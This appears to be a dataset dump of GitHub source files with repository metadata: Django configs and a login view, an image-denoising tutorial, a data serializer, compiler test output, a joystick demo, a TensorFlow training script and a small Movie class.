refs/heads/master
| 2021-01-22T00:29:14.209775 | 2017-10-17T16:17:21 | 2017-10-17T16:17:21 | 102,188,772 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 793 |
py
|
"""nbayes URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from test1.views import kakikomi
urlpatterns = [
url(r'^kakikomi/', kakikomi),
]
|
[
"[email protected]"
] | |
c4bbdfd24d7948656571bd51d3470a828aa2441a
|
7343ddd703134c47bdbc0ee2dcf438c35aac580a
|
/python_for_image_processing_APEER-master/python_for_image_processing_APEER-master/tutorial35_denoising_using_NLM.py
|
a1fe4dcf62f82620cd4483e964207ba7b8c81af6
|
[] |
no_license
|
MohamedMehery/Computer-vision-tutorial
|
a3686f8ca671e237cf87e717dfd6a8db9664c060
|
f25737b7d114ed63c6783a983fb82674f94fd14c
|
refs/heads/master
| 2023-01-01T15:58:02.439220 | 2020-10-17T11:37:39 | 2020-10-17T11:37:39 | 296,582,526 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,723 |
py
|
#Video Playlist: https://www.youtube.com/playlist?list=PLHae9ggVvqPgyRQQOtENr6hK0m1UquGaG
"""
https://scikit-image.org/docs/dev/auto_examples/filters/plot_nonlocal_means.html
Works well for random gaussian noise but not as good for salt and pepper
https://www.iro.umontreal.ca/~mignotte/IFT6150/Articles/Buades-NonLocal.pdf
The non-local means algorithm replaces the value of a pixel by an average
of a selection of other pixels values: small patches centered on the other
pixels are compared to the patch centered on the pixel of interest, and the
average is performed only for pixels that have patches close to the current patch.
"""
import cv2
import numpy as np
from skimage import io, img_as_float
from skimage.restoration import denoise_nl_means, estimate_sigma
img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))
img = img_gaussian_noise
sigma_est = np.mean(estimate_sigma(img, multichannel=False))  # grayscale input, so no channel axis
#sigma_est = 0.1
denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
patch_size=5, patch_distance=3, multichannel=False)
"""
When the fast_mode argument is False, a spatial Gaussian weighting is applied
to the patches when computing patch distances. When fast_mode is True a
faster algorithm employing uniform spatial weighting on the patches is applied.
Larger h allows more smoothing between disimilar patches.
"""
#denoise_img_as_8byte = img_as_ubyte(denoise_img)
cv2.imshow("Original", img)
cv2.imshow("NLM Filtered", denoise_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
7d791803bd7703cce697c0a6fd02403ea830a060
|
e807fe527f6d763bf3dd260f3aa713c13b9c7123
|
/src/python/procyon/dump.py
|
cc2c72e0badd1f677fc06345d52680ed9178d640
|
[
"Apache-2.0"
] |
permissive
|
orbea/procyon
|
082623058b7fcf18911756dded3f6894776a0062
|
469d94427d3b6e7cc2ab93606bdf968717a49150
|
refs/heads/master
| 2020-12-07T05:53:43.607616 | 2019-07-18T14:59:34 | 2019-07-18T14:59:34 | 232,649,374 | 0 | 0 |
Apache-2.0
| 2020-01-08T20:10:20 | 2020-01-08T20:10:19 | null |
UTF-8
|
Python
| false | false | 15,928 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2017 The Procyon Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import re
import unicodedata
from . import error
from . import py3
from . import utf
from .types import Type, typeof
_NO_QUOTE_RE = re.compile("^[A-Za-z0-9._/+-]*$")
_UNPRINTABLE_RE = re.compile("[\\000-\\011\\013-\\037\\177]")
class DefaultStyle(object):
always_short = False
separators = (": ", ", ")
class ShortStyle(object):
always_short = True
separators = (": ", ", ")
class MinifiedStyle(object):
always_short = True
separators = (":", ",")
class ProcyonEncoder(object):
def __init__(self, style, converter):
self.always_short = style.always_short
self.colon, self.comma = style.separators
self.converter = _make_converter(converter)
def iterencode(self, obj):
markers = set()
if self.converter is not None:
obj = self.converter(obj)
if self._should_dump_short_value(obj):
result = self._dump_short_value(obj, markers)
else:
result = self._dump_long_value(obj, markers, "")
for chunk in result:
yield chunk
if not self.always_short:
yield "\n"
def encode(self, obj):
return "".join(self.iterencode(obj))
def _should_dump_short_value(self, x):
if self.always_short:
return True
return ProcyonEncoder._SHOULD_DUMP_SHORT_VALUE[typeof(x).value](x)
def _dump_short_value(self, x, markers):
return self._DUMP_SHORT_VALUE[typeof(x).value](self, x, markers)
def _dump_long_value(self, x, markers, indent):
return self._DUMP_LONG_VALUE[typeof(x).value](self, x, markers, indent)
def _dump_int(self, i):
if not (-0x8000000000000000 <= i < 0x8000000000000000):
raise OverflowError("Python int too large to convert to Procyon int")
return py3.unicode(i)
def _dump_float(self, f):
if math.isnan(f):
return "nan"
elif math.isinf(f):
if f > 0:
return "inf"
else:
return "-inf"
return py3.repr(f)
@staticmethod
def _should_dump_short_data(d):
return len(d) <= 4
def _dump_short_data(self, d):
yield "$"
for byte in bytearray(d):
yield "%02x" % byte
def _dump_long_data(self, d, indent):
for i, byte in enumerate(bytearray(d)):
if i == 0:
yield "$\t"
elif (i % 16) == 0:
yield "\n%s$\t" % indent
elif (i % 2) == 0:
yield " "
yield "%02x" % byte
@staticmethod
def _should_dump_short_string(s):
if _UNPRINTABLE_RE.search(s):
return True
elif "\n" in s:
return False
return len(s) < 72
def _dump_short_string(self, s):
yield '"'
for cp in utf.code_points(s):
c = utf.unichr(cp)
if c in "\b\f\n\r\t\"\\":
yield {
"\b": "\\b",
"\f": "\\f",
"\n": "\\n",
"\r": "\\r",
"\t": "\\t",
"\"": "\\\"",
"\\": "\\\\",
}[c]
continue
category = unicodedata.category(c)
if category == "Cs":
raise ValueError("string %r contains surrogate code points" % s)
elif category in ("Cc", "Cf", "Co", "Cn"):
if cp < 0x10000:
yield "\\u%04x" % cp
else:
yield "\\U%08x" % cp
else:
yield c
yield '"'
@staticmethod
def _char_width(ch):
if " " <= ch < "\177":
return 1
category = unicodedata.category(ch)
if category.startswith("M"):
return 0
elif category.startswith("C"):
return 1
elif unicodedata.east_asian_width(ch) in "FW":
return 2
return 1
@staticmethod
def _str_width(s):
return sum(ProcyonEncoder._char_width(ch) for ch in s)
@staticmethod
def _wrap_lines(s):
line_start = 0
width = 0
prev_space = None
space = None
space_width = None
for i in py3.xrange(len(s)):
ch = s[i]
width += ProcyonEncoder._char_width(ch)
if ch == " ":
prev_space = space
space = i
space_width = width
if (space is not None) and (width > 72):
if space < (len(s) - 1):
yield s[line_start:space]
line_start = space + 1
width -= space_width
space = prev_space = None
continue
elif prev_space:
yield s[line_start:prev_space]
line_start = prev_space + 1
break
yield s[line_start:]
def _dump_long_string(self, s, indent):
paragraphs = s.split("\n")
trailing_newline = not paragraphs[-1]
if trailing_newline:
paragraphs.pop(-1)
prefix = ""
can_use_gt = True
for paragraph in paragraphs:
if prefix:
yield prefix
else:
prefix = "\n" + indent
if can_use_gt or not paragraph:
yield ">"
else:
yield "|"
if not paragraph:
can_use_gt = True
continue
can_use_gt = False
yield "\t"
line_prefix = ""
for line in ProcyonEncoder._wrap_lines(paragraph):
if line_prefix:
yield line_prefix
else:
line_prefix = "\n%s>\t" % indent
yield line
if not trailing_newline:
yield prefix + "!"
@staticmethod
def _should_dump_short_array(a):
for x in a:
if typeof(x).value <= Type.FLOAT.value:
continue
return False
return True
def _dump_short_array(self, a, markers):
if markers is not None:
id_a = id(a)
if id_a in markers:
raise ValueError("Circular reference detected")
markers.add(id_a)
yield "["
separator = ""
for x in a:
if separator:
yield separator
else:
separator = self.comma
for chunk in self._dump_short_value(x, markers):
yield chunk
yield "]"
if markers is not None:
markers.remove(id_a)
def _dump_long_array(self, a, markers, indent):
if markers is not None:
id_a = id(a)
if id_a in markers:
raise ValueError("Circular reference detected")
markers.add(id_a)
prefix = "*\t"
tail_prefix = "\n%s*\t" % indent
indent += "\t"
for i, x in enumerate(a):
yield prefix
prefix = tail_prefix
if self.converter is not None:
x = self.converter(x)
if self._should_dump_short_value(x):
for chunk in self._dump_short_value(x, markers):
yield chunk
else:
for chunk in self._dump_long_value(x, markers, indent):
yield chunk
if markers is not None:
markers.remove(id_a)
def _dump_key(self, k):
if _NO_QUOTE_RE.match(k):
return k
return "".join(self._dump_short_string(k))
@staticmethod
def _should_dump_short_map(m):
for x in py3.itervalues(m):
if typeof(x).value <= Type.FLOAT.value:
continue
return False
return True
def _dump_short_map(self, m, markers):
if markers is not None:
id_m = id(m)
if id_m in markers:
raise ValueError("Circular reference detected")
markers.add(id_m)
yield "{"
separator = ""
for k, v in py3.iteritems(m):
if not isinstance(k, py3.unicode):
raise TypeError("key %r is not a string" % k)
if separator:
yield separator
else:
separator = self.comma
yield self._dump_key(k)
yield self.colon
for chunk in self._dump_short_value(v, markers):
yield chunk
yield "}"
if markers is not None:
markers.remove(id_m)
def _dump_long_map(self, m, markers, indent):
if markers is not None:
id_m = id(m)
if id_m in markers:
raise ValueError("Circular reference detected")
markers.add(id_m)
prefix = ""
tail_prefix = "\n%s" % indent
indent += "\t"
adjusted = []
max_short_key_width = 0
for k, v in py3.iteritems(m):
if not isinstance(k, py3.unicode):
raise TypeError("key %r is not a string" % k)
k = self._dump_key(k)
if self.converter is not None:
v = self.converter(v)
short = self._should_dump_short_value(v)
if short:
width = ProcyonEncoder._str_width(k)
max_short_key_width = max(width, max_short_key_width)
adjusted.append((k, v, short, width))
else:
adjusted.append((k, v, short, 0))
for k, v, short, width in adjusted:
yield prefix
prefix = tail_prefix
if short:
yield k
yield ":"
yield " " * (max_short_key_width - width + 2)
for chunk in self._dump_short_value(v, markers):
yield chunk
else:
yield k
if k:
yield ":\n" + indent
else:
yield ":\t"
for chunk in self._dump_long_value(v, markers, indent):
yield chunk
if markers is not None:
markers.remove(id_m)
_SHOULD_DUMP_SHORT_VALUE = [
lambda x: True,
lambda x: True,
lambda x: True,
lambda x: True,
lambda x: ProcyonEncoder._should_dump_short_data(x),
lambda x: ProcyonEncoder._should_dump_short_string(x),
lambda x: ProcyonEncoder._should_dump_short_array(x),
lambda x: ProcyonEncoder._should_dump_short_map(x),
]
_DUMP_SHORT_VALUE = [
lambda self, x, markers: ["null"],
lambda self, x, markers: ["false", "true"][x],
lambda self, x, markers: [self._dump_int(x)],
lambda self, x, markers: [self._dump_float(x)],
lambda self, x, markers: self._dump_short_data(x),
lambda self, x, markers: self._dump_short_string(x),
lambda self, x, markers: self._dump_short_array(x, markers),
lambda self, x, markers: self._dump_short_map(x, markers),
]
_DUMP_LONG_VALUE = [
lambda self, x, markers, indent: ["null"],
lambda self, x, markers, indent: ["false", "true"][x],
lambda self, x, markers, indent: [self._dump_int(x)],
lambda self, x, markers, indent: [self._dump_float(x)],
lambda self, x, markers, indent: self._dump_long_data(x, indent),
lambda self, x, markers, indent: self._dump_long_string(x, indent),
lambda self, x, markers, indent: self._dump_long_array(x, markers, indent),
lambda self, x, markers, indent: self._dump_long_map(x, markers, indent),
]
def _make_converter(converter):
if converter is None:
return None
elif isinstance(converter, tuple):
if not all(callable(x) for x in converter):
raise TypeError("converter tuple elements must be callable")
def convert(x):
for convert_step in converter:
x = convert_step(x)
return x
return convert
elif callable(converter):
return converter
elif not isinstance(converter, dict):
raise TypeError("converter must be callable, tuple, or dict")
convert_none = converter.pop(None, None)
convert_bool = converter.pop(bool, None)
convert_int = converter.pop(int, None)
convert_float = converter.pop(float, None)
convert_data = converter.pop(bytes, None)
convert_string = converter.pop(py3.unicode, None)
convert_array = converter.pop(list, None)
convert_map = converter.pop(dict, None)
if not all(isinstance(k, (type, type(None))) for k in converter):
raise TypeError("converter dict keys must be type or None")
elif not all(isinstance(v, tuple) or callable(v) for v in py3.itervalues(converter)):
raise TypeError("converter dict values must be tuple or callable")
converter = {k: _make_converter(v) for k, v in py3.iteritems(converter)}
def convert(x):
if x is None:
return convert_none(x) if convert_none is not None else x
elif (x is True) or (x is False):
return convert_bool(x) if convert_bool is not None else x
elif isinstance(x, (int, py3.long)):
return convert_int(x) if convert_int is not None else x
elif isinstance(x, float):
return convert_float(x) if convert_float is not None else x
elif isinstance(x, (bytes, bytearray, memoryview)):
return convert_data(x) if convert_data is not None else x
elif isinstance(x, py3.unicode):
return convert_string(x) if convert_string is not None else x
elif isinstance(x, (list, tuple)):
return convert_array(x) if convert_array is not None else x
elif isinstance(x, dict):
return convert_map(x) if convert_map is not None else x
for t, convert_t in py3.iteritems(converter):
if isinstance(x, t):
return convert_t(x)
raise TypeError("%r is not Procyon-serializable" % x)
return convert
_DEFAULT_ARGS = (DefaultStyle, None)
_default_encoder = ProcyonEncoder(*_DEFAULT_ARGS)
def _get_encoder(style, converter):
if (style, converter) == _DEFAULT_ARGS:
return _default_encoder
return ProcyonEncoder(style, converter)
def dump(obj, fp, style=DefaultStyle, converter=None):
encoder = _get_encoder(style, converter)
for chunk in encoder.iterencode(obj):
fp.write(chunk)
def dumps(obj, style=DefaultStyle, converter=None):
encoder = _get_encoder(style, converter)
return encoder.encode(obj)
def main(args=None):
import sys
from .decode import load
if args is None:
args = sys.argv
if len(args) != 1:
sys.stderr.write("usage: python -m procyon.dump\n")
return 64
try:
x = load(sys.stdin)
except Exception as e:
sys.stderr.write("%s: %s\n" % (args[0], e))
return 1
dump(x, sys.stdout)
__all__ = ["dump", "dumps"]
if __name__ == "__main__":
import sys
sys.exit(main())
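# Example usage (illustrative; outputs inferred from the code above):
# dumps({"answer": 42})                        -> '{answer: 42}\n'
# dumps({"answer": 42}, style=MinifiedStyle)   -> '{answer:42}'
# dumps({3, 1, 2}, converter={set: sorted})    -> '[1, 2, 3]\n'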
|
[
"[email protected]"
] | |
f6b95860f10c9325ec94d3af1b593bc00be03155
|
96f76dc8e634c4e9324168c163f098ec27d431a0
|
/decaf_PA3/TestCases/S3/output/q5-array-test3.tac
|
a7b3524e0745bb28deb5fc97d16819cbac615eca
|
[
"MIT"
] |
permissive
|
joker452/Decaf-compiler
|
8e452a8d1f2a4584df7cdf3feb694e87f6333afb
|
4f81dbd3d049245af8a8cb7234db7792ca57e61a
|
refs/heads/master
| 2020-08-05T11:24:19.679494 | 2019-10-03T02:23:52 | 2019-10-03T02:23:52 | 212,482,043 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,860 |
tac
|
VTABLE(_Father) {
<empty>
Father
_Father.foo;
}
VTABLE(_Child) {
_Father
Child
_Father.foo;
}
VTABLE(_Main) {
<empty>
Main
}
FUNCTION(_Father_New) {
memo ''
_Father_New:
_T1 = 8
parm _T1
_T2 = call _Alloc
_T3 = 0
*(_T2 + 4) = _T3
_T4 = VTBL <_Father>
*(_T2 + 0) = _T4
return _T2
}
FUNCTION(_Child_New) {
memo ''
_Child_New:
_T5 = 12
parm _T5
_T6 = call _Alloc
_T7 = 0
*(_T6 + 4) = _T7
*(_T6 + 8) = _T7
_T8 = VTBL <_Child>
*(_T6 + 0) = _T8
return _T6
}
FUNCTION(_Main_New) {
memo ''
_Main_New:
_T9 = 4
parm _T9
_T10 = call _Alloc
_T11 = VTBL <_Main>
*(_T10 + 0) = _T11
return _T10
}
FUNCTION(_Father.foo) {
memo '_T0:4'
_Father.foo:
_T12 = *(_T0 + 4)
return _T12
}
FUNCTION(main) {
memo ''
main:
_T15 = 3
_T14 = _T15
_T16 = 10
_T17 = 0
_T18 = (_T16 < _T17)
if (_T18 == 0) branch _L13
_T19 = "Decaf runtime error: The length of the created array should not be less than 0.\n"
parm _T19
call _PrintString
call _Halt
_L13:
_T20 = 4
_T21 = (_T20 * _T16)
_T22 = (_T20 + _T21)
parm _T22
_T23 = call _Alloc
*(_T23 + 0) = _T16
_T23 = (_T23 + _T22)
_L14:
_T22 = (_T22 - _T20)
if (_T22 == 0) branch _L15
_T23 = (_T23 - _T20)
*(_T23 + 0) = _T14
branch _L14
_L15:
_T13 = _T23
_T24 = *(_T13 - 4)
_T26 = 4
_T27 = (_T26 * _T24)
_T28 = 0
_L17:
_T29 = (_T13 + _T28)
_T25 = *(_T29 + 0)
_T28 = (_T28 + _T26)
_T30 = 2
_T31 = (_T14 > _T30)
if (_T31 == 0) branch _L16
_T32 = (_T14 + _T25)
_T14 = _T32
parm _T25
call _PrintInt
parm _T14
call _PrintInt
_T33 = "\n"
parm _T33
call _PrintString
_T34 = (_T28 < _T27)
if (_T34 == 0) branch _L16
branch _L17
_L16:
}
|
[
"[email protected]"
] | |
f7541475b3be841d31e189cb3c9fdf1758902cb0
|
899535934b21c2afbbf00d85ee73e05df5dff876
|
/wisdompets/settings.py
|
70aff8427aa16971b8c237438a4f390456492da2
|
[] |
no_license
|
YousefKJM/Wisdompets-Django-Web-App
|
b29c71978ce85f1342e9d01b878b105e3bc5d5ed
|
aca3484256a1a77acf26e10da2358fd28006aa6a
|
refs/heads/master
| 2021-02-27T14:27:03.493629 | 2020-04-13T20:48:43 | 2020-04-13T20:48:43 | 245,612,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,198 |
py
|
"""
Django settings for wisdompets project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'eloi+4w8f!@&x9d+q5%#6g1(a3_b(q3$z76(a=(yj*+q^g++!8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'adoptions.apps.AdoptionsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'wisdompets.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wisdompets.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
|
[
"[email protected]"
] | |
4548ef21e9b08582379456e8ad9027209ec11034
|
b816b149247b395e2df5c32fe0c33557f5bc4224
|
/Unified SL-RL/joyStickExamples/Joy_Test.py
|
70ec418d7146a14aa8e85a0f5ab7bab67983d369
|
[] |
no_license
|
NiklasMelton/research_code
|
490683d979159fb77b540e016200d09912c4e1e6
|
9bc3bfc5dfd7c7b1741d91d31f940c19aff6a677
|
refs/heads/master
| 2021-01-09T20:41:09.010564 | 2016-07-01T22:07:27 | 2016-07-01T22:07:27 | 62,421,676 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 827 |
py
|
#joyTest
import pygame, sys
pygame.init()
size = width, height = 1000, 600
screen = pygame.display.set_mode(size)
font = pygame.font.SysFont("Comic Sans MS", 12)
pos = [int(width/2),int(height/2)]
joystick_count = pygame.joystick.get_count()
my_joystick = pygame.joystick.Joystick(0)
my_joystick.init()
while True:
screen.fill((255,255,255))
pygame.draw.circle(screen,(255,0,0), (pos), 50)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
h_axis = my_joystick.get_axis(0)
button = []
for b in range(0,8):
button.append([my_joystick.get_button(b),b])
print(button)
#if h_axis < 0: h_axis = 0
#if h_axis > maxAxis: h_axis = maxAxis
n_steer = h_axis
pos[0] += int(n_steer*10)
pygame.display.update()
|
[
"niklas melton"
] |
niklas melton
|
dca5f0f92983189cae3d3cb56061ba96de3d20d2
|
bc0c70345e42332d0d79a552f0ea2702c5080914
|
/recommendation/api.py
|
666a6fccfad42d99f2c0039210b394bb8a53469d
|
[] |
no_license
|
rozig/nutrition-calculator
|
603b5609b17e562b7bd351e79f85c0f485f0fe45
|
45a36c21150899723b1adad767454a40827a1616
|
refs/heads/master
| 2021-03-22T04:32:12.139535 | 2017-01-04T02:00:21 | 2017-01-04T02:00:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,753 |
py
|
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect, render_to_response
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login
from django.http import HttpResponse
from django.http import JsonResponse
from datetime import date
import json
from .models import User, Food, Machine_Data, Food_Nutrition
def login_api(request):
    error = ""
    username = password = ""
    if request.POST:
        body_unicode = request.body.decode("UTF-8")
        body = json.loads(body_unicode)
        username = body["username"]
        password = body["password"]
        print(username)
        # if not username or not password:
        #     response = JsonResponse({
        #         "code": 400,
        #         "message": u"Required request parameters are missing!"
        #     })
        #     return response
    user = authenticate(username=username, password=password)
    if user is not None:
        if user.is_active:
            login(request, user)
            response = JsonResponse({
                "code": 200,
                "message": u"Logged in successfully",
                "token": "dqqwdqdsad"
            })
            return response
        else:
            response = JsonResponse({
                "code": 403,
                "message": u"The user is inactive!"
            })
            return response
    else:
        response = JsonResponse({
            "code": 403,
            "message": u"Incorrect username or password!"
        })
        return response
|
[
"[email protected]"
] | |
5268cff948f9c48f0fd6138032a6afd729243dd6
|
2a6412a9359a1df5f8f12e319e73b9e4e46fd64c
|
/specializedSubjects/AlgorithmII/dijkstra_ON2.py
|
f7130f780bcfbbcb7e2864c816bf76de51c44942
|
[] |
no_license
|
danganhvu1998/myINIAD
|
504d1147a02f12e593f30e369daf82f85aa01bfd
|
01547673dd3065efb6c7cc8db77ec93a5a4f5d98
|
refs/heads/master
| 2022-03-17T12:58:34.647229 | 2022-02-08T06:34:19 | 2022-02-08T06:34:19 | 143,675,719 | 1 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 770 |
py
|
import networkx as nx
import matplotlib.pyplot as plt
def get_min(D, X):
    arg_min = -1
    min_value = float('inf')
    for i in range(len(D)):
        if D[i] < min_value:
            if i in X:
                arg_min = i
                min_value = D[i]
    return arg_min
def dijkstra(src, G):
    D = [float('inf')] * nx.number_of_nodes(G)
    D[src] = 0.0
    X = set(G.nodes)
    while X:
        u = get_min(D, X)
        X.remove(u)
        neighbors = G.neighbors(u)
        for v in neighbors:
            if v in X:
                if D[u] + G.edges[u, v]['weight'] < D[v]:
                    D[v] = D[u] + G.edges[u, v]['weight']
    return D
G= nx.read_weighted_edgelist('dij.edgelist', nodetype=int)
print(dijkstra(0, G))
nx.draw_networkx(G)
plt.show()
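# 'dij.edgelist' holds whitespace-separated "u v weight" lines, as expected by
# read_weighted_edgelist with nodetype=int (the contents below are illustrative,
# not the original file):
#
# 0 1 4.0
# 0 2 1.0
# 2 1 2.0
# 1 3 5.0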
|
[
"[email protected]"
] | |
1d90eb564286440c993c0ed57142493085ad53ca
|
a33264b19fb5cf9388916713baebfeed635ed26a
|
/main.py
|
c7c4f1eb38ccd31b5b87c4f0728e4a1410a4d955
|
[] |
no_license
|
LiangYuHai/DSTC-7
|
628713ac2cfe6ef7ae51dddad659b49941b1fba3
|
7d00eaed68b29d8673ab964609f82949f2972687
|
refs/heads/master
| 2020-09-11T01:27:45.246477 | 2020-01-06T05:50:49 | 2020-01-06T05:50:49 | 221,894,671 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,978 |
py
|
import os
import tensorflow as tf
from Model import Model
import pickle
import numpy as np
import sys
from sklearn.metrics import classification_report
import logging
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
handler = logging.FileHandler("log.txt")
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
with open('./data/train_dev_data.pkl', 'rb') as f:
train_context = pickle.load(f)
train_next = pickle.load(f)
train_labels = pickle.load(f)
train_context_masks = pickle.load(f)
train_next_masks = pickle.load(f)
dev_context = pickle.load(f)
dev_next = pickle.load(f)
dev_labels = pickle.load(f)
dev_context_masks = pickle.load(f)
dev_next_masks = pickle.load(f)
vocabs_size = pickle.load(f)
vocabs_dict = pickle.load(f)
index_dict = pickle.load(f)
emb = pickle.load(f)
train_context_lengths = pickle.load(f)
train_next_lengths = pickle.load(f)
dev_context_lengths = pickle.load(f)
dev_next_lengths = pickle.load(f)
if len(sys.argv) == 2 and sys.argv[1] == 'train':
model = Model(vocabs_size, emb)
model.build_graph()
sess = tf.Session()
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=1)
max_acc = 0
for e in range(50):
try:
sess.run(model.batched_iter.initializer,
feed_dict={model.context_string: train_context, model.next_tring: train_next,
model.labels: train_labels, model.context_string_lengths: train_context_lengths,
model.next_tring_lengths: train_next_lengths, model.context_masks:train_context_masks,
model.next_masks:train_next_masks})
while True:
step_, _, x_mask, cl_, acc_, _ = sess.run(
[model.global_step, model.get_next, model.c, model.cl, model.acc, model.train_op])
if step_ % 50 == 0:
print('training step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_))
print(x_mask)
logger.info(('training step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_)))
        except tf.errors.OutOfRangeError:  # iterator exhausted; this epoch is finished
            print('Training Epoch {} Done!'.format(e))
            logger.info('Training Epoch {} Done!'.format(e))
if e % 2 == 0:
true_labels = []
pred_labels = []
try:
sess.run(model.batched_iter.initializer,
feed_dict={model.context_string: dev_context, model.next_tring: dev_next,
model.labels: dev_labels, model.context_string_lengths: dev_context_lengths,
model.next_tring_lengths: dev_next_lengths, model.context_masks:dev_context_masks,
model.next_masks:dev_next_masks})
while True:
step_, data_, cl_, pred_, acc_= sess.run(
[model.global_step, model.get_next, model.cl, model.pred, model.acc])
true_labels.extend(data_[2])
pred_labels.extend(pred_)
if step_ % 10 == 0:
print('Validating step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_))
logger.info('Validating step:{} | loss:{:.3f} | acc:{:.2f}%'.format(step_, cl_, acc_))
if acc_ > max_acc:
max_acc = acc_
saver.save(sess, save_path='./result/', global_step=step_)
            except tf.errors.OutOfRangeError:  # end of the validation set
                print('Validating Done')
                print(classification_report(true_labels, pred_labels))
                logger.info('Validating Done')
                logger.info(classification_report(true_labels, pred_labels))
|
[
"[email protected]"
] | |
6654106ee8d717fd2879ea22d95e5b2fa3248d24
|
64490a017504e76b12e22024a40ec782ea6b00a4
|
/application/Movie.py
|
a8070db80185cc9fc38b44c9e0453e2724416cb3
|
[] |
no_license
|
mihaitopan/MovieRecommenderSystem
|
b0ee9400dfeecc2669bfb1ba4def7b9cc113533a
|
8377ebcf5a40b4f6195e3dc94828e4e4a36d3c0b
|
refs/heads/master
| 2020-03-20T04:42:52.479942 | 2018-06-24T18:59:55 | 2018-06-24T18:59:55 | 137,192,398 | 0 | 1 | null | 2018-06-24T18:59:55 | 2018-06-13T09:18:57 | null |
UTF-8
|
Python
| false | false | 365 |
py
|
class Movie:
def __init__(self, movieId, title, genres):
self._movieId = movieId
self._title = title
self._genres = genres
def getMovieId(self):
return self._movieId
def getTitle(self):
return self._title
def getGenres(self):
return self._genres
def __str__(self):
return self._title
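# Example (illustrative values):
# m = Movie(1, 'Toy Story (1995)', 'Animation|Children')
# print(m)        # Toy Story (1995)
# m.getGenres()   # 'Animation|Children'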
|
[
"[email protected]"
] | |
8ae9d30226f0b7472a646d8cbb5938c465c681c6
|
